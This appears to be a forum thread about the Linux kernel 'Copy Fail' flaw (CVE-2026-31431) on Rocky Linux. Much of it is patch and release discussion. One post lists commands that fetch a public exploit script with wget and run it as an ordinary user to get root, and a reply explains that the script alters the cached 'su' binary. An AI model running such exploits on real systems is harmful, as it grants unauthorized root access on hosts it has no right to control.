CVE-2026-31431 - Copy Fail - Linux kernel crypto vulnerability

I just deployed a new system using Rocky-9.7-x86_64-minimal.iso. After executing the commands below, regular users can still switch to root by running copy_fail_exp.py.

# yum install python3.11
# yum update -y
# reboot

# useradd testb
# echo "1" | passwd --stdin testb
# sudo su - testb
$ wget https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
$ python3.11 copy_fail_exp.py
Password:    # Enter password: 1
# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023


Sorry, but I don’t get it.

If the copy-fail script works, then there is no Password: prompt!
If there is a Password prompt, then the script failed to modify the page cache for su and so copy fail does not work.

Yes.

The Python script uses the bug to modify “su” (in cache) and finally runs “su”.

A normal “su” will prompt for the root password; the modified one will just give you a root shell.

Sorry, my mistake. The root password is the same as the regular user password; I was mistaken.

That’s the key point for me: you could have a situation where some complex bug only happens on Rocky and not on RHEL, or the other way round, and there’s also the issue of doing a clean removal of a Rocky-specific patch to get it back to baseline.

Will this kernel be integrated into future releases so that users don’t need to update it manually? (Including versions 8, 9, and 10)

Here we go again, this time: Dirty Frag

The question of a separate “urgent security fix” repository just got even more interesting.

Here it goes: